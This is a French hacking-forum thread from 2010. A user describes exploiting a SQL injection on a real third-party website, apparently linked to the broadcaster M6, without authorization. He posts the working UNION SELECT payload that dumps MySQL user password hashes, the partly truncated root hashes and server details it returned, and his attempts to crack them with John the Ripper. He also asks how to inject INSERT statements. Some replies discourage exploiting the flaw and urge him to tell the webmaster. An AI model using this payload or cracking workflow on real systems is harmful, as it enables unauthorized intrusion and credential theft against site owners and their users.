NewbieContest

Divers => Hacking => Discussion démarrée par: cendaar le 25 Septembre 2010 à 13:45:43


Titre: Mots de passe Mysql
Posté par: cendaar le 25 Septembre 2010 à 13:45:43
Bonjour

En fouillant un peu sur un site, j'ai trouvé une faille de type injection SQL. J'ai réussi à afficher le nom des tables et leur contenu.
A tout hasard je tente d'afficher les mots de passe BDD avec la formule qui marche jamais :

Citation
UNION SELECT 1,2,3,4,5,6,7,8,group_concat(host,0x3a,user,0x3a,password) from mysql.user--

Et il me sort les mots de passe...

Citation
localhost:root:*263D2170B73A27145FB[tronqué]
ns000000.ovh.net:root:*263D2170B73A27145FBB[tronqué] (j'ai rajouté les 0 mais j'ai l'adresse complète OVH)
127.0.0.1:root:*263D2170B73A27145FBB5[tronqué]
%:tempo:*627DB5DCC5B5AD5BA94[tronqué]
localhost:nom_de_compte:*D6EA5B04F792AB4985CC72A[tronqué]
%:autre_nom_de_compte:*678E265E9481438F90A2477[tronqué]
62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]

J'ai plusieurs questions par rapport à ca.
Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat
Citation
Loaded 1 password hash (Raw SHA1 [raw-sha1 SSE2])

Quand je vais à cette adresse "ns000000.ovh.net" il me demande login/pass. J'ai essayé toute les combinaisons trouvé plus et rien ne marche... Il y a aussi cette ligne qui ne ressemble pas au autre "62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]" qu'est ce que c'est ?

Merci d'avance pour vos réponses

Titre: Re : Mots de passe Mysql
Posté par: the lsd le 25 Septembre 2010 à 14:05:56
Mouais, c'est un peu limite comme post ça...
'fin bon, c'est juste une interrogation sur le pourquoi du comment, donc ça passe.

Pourquoi les mots de passe sont chiffrés ? Ben justement, pour avoir à les déchiffrer :p

Ensuite, c'est normal que tu n'arrives pas à rentrer sur ns000000.ovh.net. Ce sont les mots de passe mysql que tu as récupéré, donc, tu dois te connecter à la BDD, pas au site web.

Enfin, le % est surement un wildcard, c'est à dire 62.4.16.[0-255].

Par contre, je me demandes plutôt à quoi peuvent bien servir les étoiles devant les mdp.

Enjjoy

The lsd

PS : j'ai un peu modifié ton post, la liste des users/mdp est un peu trop parlante à mon goût

Titre: Re : Mots de passe Mysql
Posté par: cendaar le 25 Septembre 2010 à 14:25:38
Il me semblait qu'on pouvait accéder directement à la BDD de son serveur avec ce type d'adresse ns000000.ovh.net.
Merci pour ta réponse en tout cas. C'est vrai que les étoiles sont bizarre. Peut être que quelqu'un qui a un serveur chez OVH pourra m'en dire plus.

Titre: Re : Re : Mots de passe Mysql
Posté par: the lsd le 25 Septembre 2010 à 14:37:11
Citation de: cendaar le 25 Septembre 2010 à 14:25:38
Il me semblait qu'on pouvait accéder directement à la BDD de son serveur avec ce type d'adresse ns000000.ovh.net.
Ca je ne sais pas du tout, jamais eu de serv OVH. Mais il existe surement des webadmin SQL qui permettent de se connecter à partir d'un navigateur (d'ailleurs Google me donne son adresse : http://phpmyadmin.ovh.net/ )

Citation de: cendaar le 25 Septembre 2010 à 14:25:38
Merci pour ta réponse en tout cas. C'est vrai que les étoiles sont bizarre. Peut être que quelqu'un qui a un serveur chez OVH pourra m'en dire plus.

Je viens de trouver la réponse dans la doc Mysql : http://dev.mysql.com/doc/refman/5.1/en/password-hashing.html Faut lire

Enjoy

The lsd

Edit : D'ailleurs, je cale pas trop l'intérêt de l'étoile, d'après la doc :

Citation
A second difference is that password hashes in the new format always begin with a “*” character, whereas passwords in the old format never do.

elle sert à différencier l'ancien et le nouveau format de hashage. Mais la longueur du hash (16 et 41 pour l'ancien et le nouveau) suffit amplement. Si quelqu'un a plus dinfos...

Titre: Re : Mots de passe Mysql
Posté par: _o_ le 25 Septembre 2010 à 14:49:13
Citation de: cendaar le 25 Septembre 2010 à 13:45:43
Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat

Tu aurais aussi bien pu faire tourner JTR avec tous les mots de passe, ça ne te faisait pas perdre de temps.

Titre: Re : Mots de passe Mysql
Posté par: cendaar le 25 Septembre 2010 à 15:14:22
Merci pour vos réponses. John ne veux pas se lancer avec plusieurs MDP en meme temps chez moi, voila pourquoi j'ai pris que le premier.

Du coup j'ai un doute sur le format que je dois donner à john :

Citation
DES/BSDI/MD5/BF/AFS/LM/NT/PO/raw-MD5/IPB2/raw-sha1/salt-sha1/md5a/KRB5/bfegg/nsldap/ssha/oracle/MYSQL/mysql-sha1/mscash/lotus5/DOMINOSEC/NETLM/NETNTLM/mssql/mssql05

Il s'est lancé en raw-sha1 mais est ce qu'il va pouvoir le trouver étant donné que l'algorithme de hashage de MySQL ressemblerait à ca d'après ce que j'ai lu :

Code:
function mysql_41_password($in)
{
$p=sha1($in,true);
$p=sha1($p);
return "*".strtoupper($p);
}

Titre: Re : Mots de passe Mysql
Posté par: cendaar le 25 Septembre 2010 à 15:55:49
aure petite question: Est ce qu'il y a un moyen de faire un INSERT INTO à la suite d'un SELECT? avec un UNION ou un AND par exemple?

Titre: Re : Mots de passe Mysql
Posté par: _o_ le 25 Septembre 2010 à 16:53:32
Franchement, n'attend pas trop de réponse de ce côté là.
Tu as trouvé une faille SQL ? Bien, préviens le webmaster.
Tu préfères l'exploiter ? C'est toi qui voit, tu sais ce que tu risques, je suppose ?

Titre: Re : Mots de passe Mysql
Posté par: Barti le 25 Septembre 2010 à 16:58:09
Eh il m'as quand même dit hier sur le chan IRC que c'était sur M6 qu'il avait trouvé cette faille mdr

Titre: Re : Mots de passe Mysql
Posté par: cendaar le 25 Septembre 2010 à 18:27:22
sur un site annexe de M6 plus précisément. Pourquoi prendre ce ton la Barti ?
Merci pour vos réponses


Powered by SMF 1.1.21 | SMF © 2006-2011, Simple Machines